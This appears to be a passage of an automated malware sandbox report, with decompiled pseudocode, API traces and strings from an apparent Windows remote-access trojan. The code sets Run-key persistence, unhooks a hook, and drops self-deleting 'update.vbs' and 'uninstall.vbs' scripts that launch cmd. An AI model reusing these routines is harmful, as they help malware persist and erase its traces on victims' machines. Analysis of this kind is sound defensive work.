                                                                                				RegDeleteKeyA(0x80000001, _t65);
                                                                                				_v5 = 1;
                                                                                				_t68 = SetFileAttributesW( &_v640, 0x80);
                                                                                				if(_t68 == 0) {
                                                                                					_v5 = _v5 & _t68;
                                                                                				}
                                                                                				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
                                                                                				if(_t68 != 0) {
                                                                                					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                					SetFileAttributesW(_t68, 0x80);
                                                                                				}
                                                                                				_t69 =  &_v6;
                                                                                				__imp___wgetenv(L"Temp", _t69, L"\\update.vbs");
                                                                                				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t69);
                                                                                				L00414146();
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v88, _t69);
                                                                                				_t71 =  &_v6;
                                                                                				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t71);
                                                                                				L0041416A();
                                                                                				_t164 = _t162 + 0x18;
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v40, L"On Error Resume Next\n", _t71);
                                                                                				if(_v5 != 0) {
                                                                                					_t88 =  &_v640;
                                                                                					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t88,  &_v6, L"\")\n");
                                                                                					_t89 =  &_v72;
                                                                                					L0041416A();
                                                                                					_t90 =  &_v24;
                                                                                					L00414146();
                                                                                					_t164 = _t164 + 0x18;
                                                                                					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t90, _t90, _t89, _t89, L"while fso.FileExists(\"", _t88);
                                                                                					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				}
                                                                                				_t154 = L"\"\n";
                                                                                				_t74 =  &_v6;
                                                                                				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t74,  &_v640, _t154);
                                                                                				_t75 =  &_v72;
                                                                                				L00414146();
                                                                                				_t76 =  &_v56;
                                                                                				L00414146();
                                                                                				_t166 = _t164 + 0x18;
                                                                                				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t76, _t76, _t75, _t75, _t74);
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				if(_v5 != 0) {
                                                                                					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
                                                                                				}
                                                                                				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
                                                                                				if(_t76 != 0) {
                                                                                					_t85 =  &_v72;
                                                                                					L0041416A();
                                                                                					_t86 =  &_v56;
                                                                                					L00414146();
                                                                                					_t166 = _t166 + 0x18;
                                                                                					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t86, _t86, _t85, _t85, L"fso.DeleteFolder \"", 0x41bc68, _t154);
                                                                                					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				}
                                                                                				_t77 =  &_v6;
                                                                                				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"\"\"\", 0", _t77, "\n");
                                                                                				_t79 =  &_v5;
                                                                                				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\"", _t79,  &_a4, _t77);
                                                                                				_t80 =  &_v24;
                                                                                				L0041414C();
                                                                                				_t81 =  &_v72;
                                                                                				L0041414C();
                                                                                				_t82 =  &_v56;
                                                                                				L00414146();
                                                                                				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t82, _t82, _t81, _t81, _t80, _t80, _t79);
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
                                                                                				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
                                                                                				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                				_t84 = E00412D56( &_v40, _t82 << 1, _t82 << 1, _t82, 0);
                                                                                				if(_t84 != 0) {
                                                                                					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                					_t84 = ShellExecuteW(0, L"open", _t84, 0x415800, 0x415800, 0);
                                                                                					if(_t84 > 0x20) {
                                                                                						exit(0);
                                                                                					}
                                                                                				}
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				return _t84;
                                                                                			}


                                                                                APIs
                                                                                  • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                                                                  • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004085E9
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000004,0041B310,00000000), ref: 00408613
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000004,0041B310,00000000), ref: 0040862F
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000004,0041B310,00000000), ref: 0040864F
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000004,0041B310,00000000), ref: 0040866F
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00408678
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 00408698
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 004086B6
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004086BE
                                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 004086C6
                                                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 004086E3
                                                                                • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 004086F7
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 00408709
                                                                                • SetFileAttributesW.KERNEL32(00000000), ref: 00408710
                                                                                  • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000528A,00000000,00000004,0041B310,004085CD), ref: 00406D56
                                                                                  • Part of subcall function 00406D41: UnhookWindowsHookEx.USER32(00000000), ref: 00406D5F
                                                                                  • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000526A,00000000), ref: 00406D6F
                                                                                • _wgetenv.MSVCRT ref: 00408720
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040872B
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408736
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408741
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject"),?), ref: 00408753
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,On Error Resume Next,00000000), ref: 00408763
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040876E
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,")), ref: 0040878D
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,while fso.FileExists(",00000000), ref: 0040879D
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004087AA
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004087B6
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004087BF
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004087C8
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004087D1
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ",?,?,00416354), ref: 004087F0
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004087FB
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408808
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408814
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040881D
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408826
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040882F
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(wend), ref: 00408843
                                                                                • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 00408850
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,fso.DeleteFolder ",0041BC68,00416354), ref: 00408867
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00416354), ref: 00408874
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00416354), ref: 00408880
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 00408889
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 00408892
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 004088A9
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",00000000,?,00000000), ref: 004088C0
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004088CB
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004088D8
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004088E5
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004088F1
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004088FA
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408903
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040890C
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408915
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040891E
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 0040892C
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408938
                                                                                • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00408942
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040894E
                                                                                  • Part of subcall function 00412D56: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 00408967
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00408974
                                                                                • exit.MSVCRT ref: 00408980
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408989
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408992
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040899B
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$G@2@@0@V?$basic_string@$?c_str@?$basic_string@Hstd@@$??0?$basic_string@G@1@@V01@V10@Y?$basic_string@$D@2@@std@@D@std@@FileV01@@$TerminateV10@@$??9std@@AttributesThreadV10@0@$?length@?$basic_string@?size@?$basic_string@CreateDeleteExecuteHookModuleNameObjectProcessShellSingleUnhookWaitWindows_wgetenvexit
                                                                                • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 19%
                                                                                			E00408245() {
                                                                                				char _v0;
                                                                                				signed int _v5;
                                                                                				char _v6;
                                                                                				signed int _v9;
                                                                                				char _v10;
                                                                                				char _v24;
                                                                                				char _v28;
                                                                                				char _v40;
                                                                                				char _v44;
                                                                                				char _v56;
                                                                                				char _v60;
                                                                                				char _v72;
                                                                                				char _v76;
                                                                                				char _v88;
                                                                                				char _v92;
                                                                                				void* _v108;
                                                                                				void* _v124;
                                                                                				void _v606;
                                                                                				short _v608;
                                                                                				short _v644;
                                                                                				void* _t112;
                                                                                				void* _t114;
                                                                                				char* _t116;
                                                                                				WCHAR* _t118;
                                                                                				signed char _t120;
                                                                                				char* _t121;
                                                                                				char* _t123;
                                                                                				char* _t126;
                                                                                				char* _t127;
                                                                                				char* _t128;
                                                                                				short* _t131;
                                                                                				void* _t132;
                                                                                				char* _t134;
                                                                                				WCHAR* _t137;
                                                                                				char* _t138;
                                                                                				char* _t140;
                                                                                				char* _t143;
                                                                                				char* _t144;
                                                                                				char* _t145;
                                                                                				char* _t146;
                                                                                				signed int* _t148;
                                                                                				char* _t149;
                                                                                				char* _t150;
                                                                                				signed int _t151;
                                                                                				short* _t153;
                                                                                				char* _t154;
                                                                                				char* _t155;
                                                                                				WCHAR* _t157;
                                                                                				char* _t158;
                                                                                				char* _t159;
                                                                                				char* _t163;
                                                                                				WCHAR* _t165;
                                                                                				char* _t166;
                                                                                				char* _t167;
                                                                                				intOrPtr* _t174;
                                                                                				short* _t285;
                                                                                				void* _t297;
                                                                                				void* _t299;
                                                                                				void* _t301;
                                                                                				void* _t303;
                                                                                				void* _t304;
                                                                                				void* _t305;
                                                                                				void* _t306;
                                                                                				void* _t308;
                                                                                				void* _t310;
                                                                                
                                                                                				_t112 = E0040AC8C();
                                                                                				if( *0x41b154 != 0x30) {
                                                                                					_t112 = E00406D41(0x41b900);
                                                                                				}
                                                                                				if( *0x41c118 == 1) {
                                                                                					_t112 = E0041050F(_t112);
                                                                                				}
                                                                                				if( *0x41b22a != 0) {
                                                                                					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                					_t112 = E00412BEE(_t112);
                                                                                				}
                                                                                				_t172 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                                                                                				if( *0x41ba58 == 1) {
                                                                                					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                					_t112 = E0040B9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t112);
                                                                                					_t297 = _t297 + 0xc;
                                                                                				}
                                                                                				if( *0x41bc64 == 1) {
                                                                                					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                					_t112 = E0040B9E8(0x80000002, _t172, _t112);
                                                                                					_t297 = _t297 + 0xc;
                                                                                				}
                                                                                				if( *0x41ba20 == 1) {
                                                                                					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                					E0040B9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t112);
                                                                                					_t297 = _t297 + 0xc;
                                                                                				}
                                                                                				_v608 = _v608 & 0x00000000;
                                                                                				_t114 = memset( &_v606, 0, 0x81 << 2);
                                                                                				asm("stosw");
                                                                                				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                                                                				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                				_t116 = E0040B692(0x80000001,  &_v608, "exepath",  &_v608, 0x208, _t114, _t114);
                                                                                				_t299 = _t297 + 0x28;
                                                                                				if(_t116 == 0) {
                                                                                					_t116 = GetModuleFileNameW(0,  &_v608, 0x208);
                                                                                				}
                                                                                				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                				RegDeleteKeyA(0x80000001, _t116);
                                                                                				_t174 = __imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z;
                                                                                				_v5 = 1;
                                                                                				_t118 =  *_t174(0x41bc68, 0x415800);
                                                                                				if(_t118 != 0) {
                                                                                					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                					SetFileAttributesW(_t118, 0x80);
                                                                                				}
                                                                                				_t120 = SetFileAttributesW( &_v608, 0x80);
                                                                                				if(_t120 == 0) {
                                                                                					_v5 = _v5 & _t120;
                                                                                				}
                                                                                				_t121 =  &_v6;
                                                                                				__imp___wgetenv(L"Temp", _t121, L"\\uninstall.vbs");
                                                                                				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t121);
                                                                                				L00414146();
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v88, _t121);
                                                                                				_t123 =  &_v6;
                                                                                				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t123);
                                                                                				L0041416A();
                                                                                				_t301 = _t299 + 0x18;
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v24, L"On Error Resume Next\n", _t123);
                                                                                				if(_v5 != 0) {
                                                                                					_t165 =  &_v608;
                                                                                					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t165,  &_v6, L"\")\n");
                                                                                					_t166 =  &_v72;
                                                                                					L0041416A();
                                                                                					_t167 =  &_v40;
                                                                                					L00414146();
                                                                                					_t301 = _t301 + 0x18;
                                                                                					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t167, _t167, _t166, _t166, L"while fso.FileExists(\"", _t165);
                                                                                					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				}
                                                                                				_t126 =  &_v6;
                                                                                				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t126,  &_v608, L"\"\n");
                                                                                				_t127 =  &_v72;
                                                                                				L00414146();
                                                                                				_t128 =  &_v56;
                                                                                				L00414146();
                                                                                				_t303 = _t301 + 0x18;
                                                                                				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t128, _t128, _t127, _t127, _t126);
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				if(_v5 != 0) {
                                                                                					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
                                                                                				}
                                                                                				_push(0x415800);
                                                                                				_push(0x41bc68);
                                                                                				if( *_t174() != 0) {
                                                                                					_t163 =  &_v72;
                                                                                					L0041416A();
                                                                                					_t129 =  &_v56;
                                                                                					L00414146();
                                                                                					_t303 = _t303 + 0x18;
                                                                                					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t129, _t129, _t163, _t163, L"fso.DeleteFolder \"", 0x41bc68, L"\"\n");
                                                                                					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				}
                                                                                				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
                                                                                				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
                                                                                				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                				_t131 = E00412D56( &_v24, _t129 << 1, _t129 << 1, _t129, 0);
                                                                                				_t304 = _t303 + 0x10;
                                                                                				if(_t131 != 0) {
                                                                                					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                					ShellExecuteW(0, L"open", _t131, 0x415800, 0x415800, 0);
                                                                                				}
                                                                                				exit(0);
                                                                                				_pop(_t280);
                                                                                				_pop(_t291);
                                                                                				_pop(_t175);
                                                                                				_t305 = _t304 - 0x27c;
                                                                                				_t132 = E0040AC8C();
                                                                                				if( *0x41b154 != 0x30) {
                                                                                					_t132 = E00406D41(0x41b900);
                                                                                				}
                                                                                				if( *0x41c118 == 1) {
                                                                                					_t132 = E0041050F(_t132);
                                                                                				}
                                                                                				if( *0x41b22a != 0) {
                                                                                					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                					_t132 = E00412BEE(_t132);
                                                                                				}
                                                                                				_t176 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                                                                                				if( *0x41ba58 == 1) {
                                                                                					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                					_t132 = E0040B9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t132);
                                                                                					_t305 = _t305 + 0xc;
                                                                                				}
                                                                                				if( *0x41bc64 == 1) {
                                                                                					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                					_t132 = E0040B9E8(0x80000002, _t176, _t132);
                                                                                					_t305 = _t305 + 0xc;
                                                                                				}
